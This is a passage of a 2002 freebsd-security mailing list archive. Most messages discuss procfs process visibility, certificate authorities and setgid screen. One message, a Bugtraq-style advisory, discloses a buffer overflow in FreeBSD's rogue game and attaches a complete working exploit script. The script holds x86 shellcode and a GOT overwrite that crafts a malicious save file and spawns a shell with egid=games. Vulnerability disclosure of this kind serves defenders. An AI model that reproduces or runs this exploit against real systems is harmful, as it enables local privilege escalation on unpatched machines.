4.6.2-RELEASE and 4.7-RC. -- Nomad [%% When you dance with the devil %%] [%% the devil don't change. %%] [%% The devil changes you. %%] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 27 5:55:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DD8CD37B401 for ; Fri, 27 Sep 2002 05:55:13 -0700 (PDT) Received: from tagish.taiga.ca (tagish.taiga.ca [204.209.164.130]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3D55043E3B for ; Fri, 27 Sep 2002 05:55:13 -0700 (PDT) (envelope-from campbell@tagish.taiga.ca) Received: (from campbell@localhost) by tagish.taiga.ca (8.9.3/8.9.1) id GAA18796; Fri, 27 Sep 2002 06:54:08 -0600 Date: Fri, 27 Sep 2002 06:54:08 -0600 From: Duncan Campbell Message-Id: <200209271254.GAA18796@tagish.taiga.ca> To: freebsd-security@FreeBSD.ORG, mailman@crypton.pl Subject: Re: kern.ps_showallprocs and procfs Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I tend to regard procfs as something of a debugging tool. If you limit it as is probably necessary to do what you suggest, its value as a tool becomes degraded. Duihb To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 27 6:14: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3A4B437B401 for ; Fri, 27 Sep 2002 06:14:00 -0700 (PDT) Received: from localhost.neotext.ca (h24-70-64-200.ed.shawcable.net [24.70.64.200]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5048243E8A for ; Fri, 27 Sep 2002 06:13:58 -0700 (PDT) (envelope-from freebsd@babayaga.neotext.ca) Received: from babayaga.neotext.ca (localhost.neotext.ca [127.0.0.1]) by localhost.neotext.ca (8.12.6/8.12.5) with ESMTP id g8RDFZi0008059; Fri, 27 Sep 2002 07:15:35 -0600 (MDT) (envelope-from freebsd@babayaga.neotext.ca) From: "Duncan Patton a Campbell is Dhu" To: Duncan Campbell , freebsd-security@FreeBSD.ORG, mailman@crypton.pl Subject: Re: kern.ps_showallprocs and procfs Date: Fri, 27 Sep 2002 07:15:35 -0600 Message-Id: <20020927131535.M11061@babayaga.neotext.ca> In-Reply-To: <200209271254.GAA18796@tagish.taiga.ca> References: <200209271254.GAA18796@tagish.taiga.ca> X-Mailer: Open WebMail 1.70 20020712 X-OriginatingIP: 127.0.0.1 (freebsd) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I should have added also that this is an antique debate ;-) > I tend to regard procfs as something of a debugging > tool. If you limit it as is probably necessary to > do what you suggest, its value as a tool becomes degraded. > > Duihb > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of > the message Duncan Patton a Campbell is Duihb To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 27 6:16:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 64F6837B406 for ; Fri, 27 Sep 2002 06:16:29 -0700 (PDT) Received: from insomnia.spc.org (insomnia.spc.org [195.224.94.183]) by mx1.FreeBSD.org (Postfix) with SMTP id 8CFCD43E7B for ; Fri, 27 Sep 2002 06:16:27 -0700 (PDT) (envelope-from bms@insomnia.spc.org) Received: (qmail 4967 invoked by uid 1031); 27 Sep 2002 13:12:35 -0000 Date: Fri, 27 Sep 2002 14:12:35 +0100 From: Bruce M Simpson To: Ivailo Tanusheff Cc: FreeBSD Questions , FreeBSD Security , FreeBSD Net Subject: Re: PKI Message-ID: <20020927131234.GE26352@spc.org> Mail-Followup-To: Bruce M Simpson , Ivailo Tanusheff , FreeBSD Questions , FreeBSD Security , FreeBSD Net References: <02f001c2660a$26e197e0$faf810ac@sof.procreditbank.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <02f001c2660a$26e197e0$faf810ac@sof.procreditbank.bg> User-Agent: Mutt/1.3.28i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'm working on a port of OpenCA which is almost ready. Hopefully within the next week (I'm ill at the moment.) :( www.openca.org BMS On Fri, Sep 27, 2002 at 12:42:10PM +0300, Ivailo Tanusheff wrote: > Do you know if there is any Certificate server available for FreeBSD? I > need to issue certificates to our customers. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 27 8:30:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A8C2F37B404 for ; Fri, 27 Sep 2002 08:30:25 -0700 (PDT) Received: from chicken.orbitel.bg (chicken100.orbitel.bg [195.24.32.21]) by mx1.FreeBSD.org (Postfix) with SMTP id 4665D43E65 for ; Fri, 27 Sep 2002 08:30:24 -0700 (PDT) (envelope-from i.tanusheff@procreditbank.com) Received: (qmail 18964 invoked from network); 27 Sep 2002 15:30:22 -0000 Received: from unknown (HELO procreditbank.com) (212.95.179.198) by chicken.orbitel.bg with SMTP; 27 Sep 2002 15:30:22 -0000 Received: from itaush [172.16.248.250] by Proxy+; Fri, 27 Sep 2002 17:51:35 +0300 for From: "Ivailo Tanusheff" To: "FreeBSD Security" Subject: FW: PKI Date: Fri, 27 Sep 2002 17:51:35 +0300 Message-ID: <033f01c26635$601edb50$faf810ac@sof.procreditbank.bg> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, No, I mean certificate for digital signing and encryption. I need to issue such certificates to customers. Something like VeriSign, but for the local organization. Ivilo -----Original Message----- From: owner-freebsd-questions@FreeBSD.ORG [mailto:owner-freebsd-questions@FreeBSD.ORG] On Behalf Of Roman V. Mashak Sent: Friday, September 27, 2002 1:18 PM To: FreeBSD Questions; FreeBSD Security Subject: Re: PKI On Fri, Sep 27, 2002 at 12:42:10PM +0300, Ivailo Tanusheff wrote: > Do you know if there is any Certificate server available for FreeBSD? I > need to issue certificates to our customers. Do you mean SSL related stuff ? -- Best regards, Roman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 27 8:51: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 18D7537B401 for ; Fri, 27 Sep 2002 08:50:58 -0700 (PDT) Received: from cactus.fi.uba.ar (cactus.fi.uba.ar [157.92.49.108]) by mx1.FreeBSD.org (Postfix) with ESMTP id 08EC443E77 for ; Fri, 27 Sep 2002 08:50:57 -0700 (PDT) (envelope-from fgleiser@cactus.fi.uba.ar) Received: from cactus.fi.uba.ar (cactus.fi.uba.ar [157.92.49.108]) by cactus.fi.uba.ar (8.12.3/8.12.3) with ESMTP id g8RFmKq4081541 for ; Fri, 27 Sep 2002 12:48:20 -0300 (ART) (envelope-from fgleiser@cactus.fi.uba.ar) Date: Fri, 27 Sep 2002 12:48:19 -0300 (ART) From: Fernando Gleiser To: FreeBSD Security Subject: Re: FW: PKI In-Reply-To: <033f01c26635$601edb50$faf810ac@sof.procreditbank.bg> Message-ID: <20020927124317.P59093-100000@cactus.fi.uba.ar> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Status: No, hits=-2.3 required=5.0 tests=IN_REP_TO,DOUBLE_CAPSWORD version=2.31 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, 27 Sep 2002, Ivailo Tanusheff wrote: > > Hi, > > No, I mean certificate for digital signing and encryption. I need to > issue such certificates to customers. Something like VeriSign, but for > the local organization. openssl has all the functionality to build a CA, but it is a bit hard to do (it works, but I wouldn't call it "simple"). There is an openCA project (www.openca.org), but I haven't tried it. Hope this helps. Fer > > Ivilo > > > -----Original Message----- > From: owner-freebsd-questions@FreeBSD.ORG > [mailto:owner-freebsd-questions@FreeBSD.ORG] On Behalf Of Roman V. > Mashak > Sent: Friday, September 27, 2002 1:18 PM > To: FreeBSD Questions; FreeBSD Security > Subject: Re: PKI > > On Fri, Sep 27, 2002 at 12:42:10PM +0300, Ivailo Tanusheff wrote: > > Do you know if there is any Certificate server available for FreeBSD? > I > > need to issue certificates to our customers. > Do you mean SSL related stuff ? > > -- > Best regards, Roman > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 27 9:28:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C725637B401 for ; Fri, 27 Sep 2002 09:28:14 -0700 (PDT) Received: from drmirage.clustermonkey.org (drmirage.clustermonkey.org [198.78.66.49]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8842343E42 for ; Fri, 27 Sep 2002 09:28:14 -0700 (PDT) (envelope-from laz@drmirage.clustermonkey.org) Received: by drmirage.clustermonkey.org (Postfix, from userid 1000) id 5502C54E6A; Fri, 27 Sep 2002 11:57:06 -0400 (EDT) Date: Fri, 27 Sep 2002 11:57:06 -0400 From: Adam Lazur To: freebsd-security@FreeBSD.ORG Subject: Re: screen question/problem. Message-ID: <20020927155706.GA59758@drmirage.clustermonkey.org> References: <20020925144631.E90374-100000@cithaeron.argolis.org> <20020925123015.Y11323-100000@walter> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020925123015.Y11323-100000@walter> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Jason Stone (jason-fbsd-security@shalott.net) said: > > Screen likes to be root so it can do things like update utmp (or wtmp, > > whichever). > > I've been wondering about this for a while - on my personal systems, I've > always created a group wtmp and made utmp/wtmp/lastlog group wtmp, group > writable, and screen, xterm, etc, setgid wtmp instead of setuid root. > > This seems to me to preserve that portion of the functionality (I know > that screen also likes to be setuid root for other reasons) while being > substantially safer than having everything just be setuid root. > > Am I missing something? Are there other implications to using a wtmp > group and setgid binaries? I think that this would be a nice change to > make to the base system if it's reasonable to do so. There are issues with setting permissions on your tty. On my FreeBSD 4.5 box it keeps the default perms root:wheel 666, which is bad. You want it to end up with youruser:tty 620. I maintain screen for the Debian project, and we have been shipping screen setgid utmp for a long time. We avoid the tty perms problem by having default perms on unix98 tty's that work out okay (though there is a bug on non-devfs systems atm). For full functionality, screen must also be setuid root to do multi-user. This is another permissions setup problem (on the named pipes this time) that making screen setuid root avoids. It's on my todo list to fix things to that a setgid utmp screen will work with multi-user screen "out of the box" in the future. -- Adam Lazur, Cluster Monkey To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 27 21:27:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 656BC37B401 for ; Fri, 27 Sep 2002 21:27:56 -0700 (PDT) Received: from drmirage.clustermonkey.org (drmirage.clustermonkey.org [198.78.66.49]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2864443E75 for ; Fri, 27 Sep 2002 21:27:56 -0700 (PDT) (envelope-from laz@drmirage.clustermonkey.org) Received: by drmirage.clustermonkey.org (Postfix, from userid 1000) id 7E89F51215; Sat, 28 Sep 2002 00:27:51 -0400 (EDT) Date: Sat, 28 Sep 2002 00:27:51 -0400 From: Adam Lazur To: freebsd-security@FreeBSD.ORG Subject: Re: screen question/problem. Message-ID: <20020928042751.GF59758@drmirage.clustermonkey.org> References: <20020925144631.E90374-100000@cithaeron.argolis.org> <20020925123015.Y11323-100000@walter> <20020927155706.GA59758@drmirage.clustermonkey.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020927155706.GA59758@drmirage.clustermonkey.org> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Adam Lazur (adam@lazur.org) said: > I maintain screen for the Debian project, and we have been shipping > screen setgid utmp for a long time. We avoid the tty perms problem by > having default perms on unix98 tty's that work out okay (though there is > a bug on non-devfs systems atm). Actually, that's incorrect. It looks like it's accomplished via the grantpt function in glibc. -- Adam Lazur, Cluster Monkey To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 27 21:31:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8AAD837B401 for ; Fri, 27 Sep 2002 21:31:55 -0700 (PDT) Received: from mail.crypton.pl (ns.crypton.pl [195.216.109.11]) by mx1.FreeBSD.org (Postfix) with SMTP id 2A05243E6E for ; Fri, 27 Sep 2002 21:31:54 -0700 (PDT) (envelope-from mailman@mail.crypton.pl) Received: (qmail 75516 invoked by uid 1017); 28 Sep 2002 04:31:52 -0000 Date: Sat, 28 Sep 2002 06:31:52 +0200 From: Nomad To: freebsd-security@freebsd.org Subject: Re: kern.ps_showallprocs and procfs Message-ID: <20020928043152.GA75495@killer.crypton.pl> References: <20020927113200.GB71234@killer.crypton.pl> <20020927124625.M76190@babayaga.neotext.ca> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-2 Content-Disposition: inline In-Reply-To: <20020927124625.M76190@babayaga.neotext.ca> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Well, if we tend to regard procfs as debugging tool only then maybe it shouldn't be mounted by default on initial instalation ? Anyway in Solaris it works without giving information of other's processes and still can be good debugging tool for root. Antique debate: hehe, maybe, but we waiting for 4.7 RELEASE and can do something with that in easy way (not mounted by default) without spend m Well: not 'we' because I am not developer of Free, but it can be done... I just don't like when my fried whose using OpenBSD and don't have procfs on default laugh at me :( On Fri, Sep 27, 2002 at 06:46:25AM -0600, Duncan Patton a Campbell is Dhu wrote: > I tend to regard procfs as something of a debugging tool. If > you limit > it as is probably necessary to do what you suggest, its value as > a tool > becomes degraded. > -- Nomad [%% When you dance with the devil %%] [%% the devil don't change. %%] [%% The devil changes you. %%] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 28 7:42:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4124F37B401 for ; Sat, 28 Sep 2002 07:42:18 -0700 (PDT) Received: from users.munk.nu (213-152-51-194.dsl.eclipse.net.uk [213.152.51.194]) by mx1.FreeBSD.org (Postfix) with ESMTP id 707AE43E75 for ; Sat, 28 Sep 2002 07:42:16 -0700 (PDT) (envelope-from munk@users.munk.nu) Received: from users.munk.nu (localhost [127.0.0.1]) by users.munk.nu (8.12.5/8.12.3) with ESMTP id g8SFgdCn015246 for ; Sat, 28 Sep 2002 15:42:40 GMT (envelope-from munk@users.munk.nu) Received: (from munk@localhost) by users.munk.nu (8.12.5/8.12.3/Submit) id g8SFgdun015245 for freebsd-security@freebsd.org; Sat, 28 Sep 2002 15:42:39 GMT Date: Sat, 28 Sep 2002 15:42:39 +0000 From: Jez Hancock To: freebsd-security@freebsd.org Subject: Re: kern.ps_showallprocs and procfs Message-ID: <20020928154239.GA15224@users.munk.nu> Mail-Followup-To: freebsd-security@freebsd.org References: <20020927113200.GB71234@killer.crypton.pl> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020927113200.GB71234@killer.crypton.pl> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Sep 27, 2002 at 01:32:00PM +0200, Nomad wrote: > If somebody has some good solution to this problem: I'am ready to read about it. Start here: http://marc.theaimsgroup.com/?w=2&r=1&s=kern.ps_showallprocs&q=t and you should find this: http://marc.theaimsgroup.com/?t=103044131400003&r=1&w=2 from about a month or so ago. HTH, Jez To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 28 11:57:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6AB4137B401 for ; Sat, 28 Sep 2002 11:57:24 -0700 (PDT) Received: from ai.iserver.sk (ai.iserver.sk [195.91.32.249]) by mx1.FreeBSD.org (Postfix) with SMTP id CA79643E81 for ; Sat, 28 Sep 2002 11:57:22 -0700 (PDT) (envelope-from stanojr@ai.iserver.sk) Received: (qmail 1071 invoked by uid 500); 28 Sep 2002 18:57:18 -0000 Date: Sat, 28 Sep 2002 20:57:18 +0200 From: psj To: freebsd-security@freebsd.org Cc: bugtraq@securityfocus.com Subject: local exploitable overflow in rogue/FreeBSD Message-ID: <20020928205718.C29783@iserver.sk> Mail-Followup-To: freebsd-security@freebsd.org, bugtraq@securityfocus.com Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="5vNYLRcllDrimb99" Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --5vNYLRcllDrimb99 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline VULNERABLE APPLICATION: rogue in FreeBSD (tested on 4.6-RELEASE) ABOUT APPLICATION: rogue is a fantasy game which is indirectly setgid games IMPACT: low/medium EXPLOITATION: we can be egid=games, with this we can: 1. edit score files in /var/games 2. /var/games use as a storage directory (typicaly when we are limited by quota) SOLUTION: 1. disabling rogue game via /etc/dm.conf (mad rogueists KILL YOU) 2. fix in the source code ABOUT BUG: At first about dm (from man page): Dm is a program used to regulate game playing. Dm expects to be invoked with the name of a game that a user wishes to play. This is done by cre- ating symbolic links to dm, in the directory /usr/games for all of the regulated games. The actual binaries for these games should be placed in a ``hidden'' directory, /usr/games/hide, that may only be accessed by the dm program. Dm determines if the requested game is available and, if so, runs it. The file /etc/dm.conf controls the conditions under which games may be run. /usr/games/dm is of course setgid games Other games which don`t needed games euid revoke privileges after start. Games which needed games euid after start open the score file and revoke privileges. Rogue don`t revoke privileges after start, it run egid games. Vulnerability is in restoring saved game. There is a function read_string in restore function in save.c file which don`t check the size of variable. We can rewrite an address in GOT (as in my attached exploit). ATTACHMENTS: instant-rogue-exp.sh - instant exploit to get egid=games AUTHOR: stanojr@iserver.sk ps: sorry, i know, my english is very bad :] --5vNYLRcllDrimb99 Content-Type: application/x-sh Content-Disposition: attachment; filename="instant-rogue-exp.sh" #!/bin/sh echo "ROGUE EXPLOIT FOR FreeBSD/i386 (4.6-RELEASE) AUTHOR: stanojr@iserver.sk" echo "WARNING:" echo "This exploit create 4 files: /tmp/sh, ./rogue-exp.c, ./rogue-exp, ./rogue.hsave\n" echo "Creating rogue-exp.c which create a vulnerable save file" cat >rogue-exp.c <<_EOF_ #include #include /* * shellcode exec /tmp/sh because of horrible terminal which * mess ncurses and we must fix it */ char shellcode[] = "\x31\xc0\x50\x89\xe2\x68\x70\x2f\x73\x68\x68\x2f\x2f\x74\x6d" "\x89\xe3\x50\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80"; long xxx(); int main(ac,av) int ac; char *av[]; { char hunger_str[13475+strlen(shellcode)]; char tmp[4]; unsigned long addr=0x08060b38; // address after strcpy in GOT FILE *fp; if (ac!=2) usage(av[0]); memset(tmp,'A',sizeof(tmp)); // only temporary variable memset(hunger_str,'A',sizeof(hunger_str)); // our vulnerable variable memcpy(hunger_str+13470,&addr,sizeof(addr)); memcpy(hunger_str+13474,shellcode,sizeof(shellcode)); // we put shellcode after addr hunger_str[sizeof(hunger_str)]=0; //we must close string if ((fp=fopen(av[1],"w"))==NULL){ perror("fopen"); } (void) xxx(1); r_write(fp, tmp, sizeof(char)); //detect_monster (see save.c) r_write(fp, tmp, sizeof(short)); //cur_level (see save.c) r_write(fp, tmp, sizeof(short)); //max_level (see save.c) write_string(hunger_str, fp); //our vulnerable variable fclose(fp); return 0; } usage(p) char *p; { printf("usage: %s save\nsave - vulnerable save file\n",p); exit(0); } // xxx,xxxx,r_write,write_string stolen from rogue and little changed r_write(fp, buf, n) FILE *fp; const char *buf; int n; { if (fwrite(buf, sizeof(char), n, fp) != n) { perror("fwrite"); } } write_string(s, fp) char *s; FILE *fp; { short n; n = strlen(s) + 1; xxxx(s, n); r_write(fp, (char *) &n, sizeof(short)); r_write(fp, s, n); } xxxx(buf, n) char *buf; short n; { short i; unsigned char c; for (i = 0; i < n; i++) { /* It does not matter if accuracy is lost during this assignment */ c = (unsigned char) xxx(0); buf[i] ^= c; } } long xxx(st) char st; { static long f, s; long r; if (st) { f = 37; s = 7; return(0L); } r = ((f * s) + 9337) % 8887; f = s; s = r; return(r); } _EOF_ echo "Creating /tmp/sh with stty command to fix terminal and then exec /bin/sh command" cat >/tmp/sh <<_EOF_ #!/bin/sh stty icanon echo icrnl onlcr oxtabs echo "!!! BOOOM !!!" id exec /bin/sh _EOF_ echo "cmd: chmod 755 /tmp/sh" chmod 755 /tmp/sh echo "cmd: make rogue-exp" make rogue-exp echo "Creating vulnerable save file" echo "cmd: ./rogue-exp rogue.hsave" ./rogue-exp rogue.hsave echo "Execing rogue with vuln save file" echo "cmd: rogue rogue.hsave" rogue rogue.hsave --5vNYLRcllDrimb99-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 28 12:40: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0E11F37B401 for ; Sat, 28 Sep 2002 12:40:04 -0700 (PDT) Received: from mail.crypton.pl (ns.crypton.pl [195.216.109.11]) by mx1.FreeBSD.org (Postfix) with SMTP id 7C44743E86 for ; Sat, 28 Sep 2002 12:40:02 -0700 (PDT) (envelope-from mailman@mail.crypton.pl) Received: (qmail 76544 invoked by uid 1017); 28 Sep 2002 19:40:01 -0000 Date: Sat, 28 Sep 2002 21:40:01 +0200 From: Nomad To: Jez Hancock Cc: freebsd-security@freebsd.org Subject: Re: kern.ps_showallprocs and procfs Message-ID: <20020928194001.GC75716@killer.crypton.pl> References: <20020927113200.GB71234@killer.crypton.pl> <20020928154239.GA15224@users.munk.nu> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-2 Content-Disposition: inline In-Reply-To: <20020928154239.GA15224@users.munk.nu> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org That is what I need ! Thanks ! On Sat, Sep 28, 2002 at 03:42:39PM +0000, Jez Hancock wrote: > On Fri, Sep 27, 2002 at 01:32:00PM +0200, Nomad wrote: > > If somebody has some good solution to this problem: I'am ready to read about it. > Start here: > http://marc.theaimsgroup.com/?w=2&r=1&s=kern.ps_showallprocs&q=t > > and you should find this: > http://marc.theaimsgroup.com/?t=103044131400003&r=1&w=2 > > from about a month or so ago. > > HTH, > Jez > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Nomad [%% When you dance with the devil %%] [%% the devil don't change. %%] [%% The devil changes you. %%] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message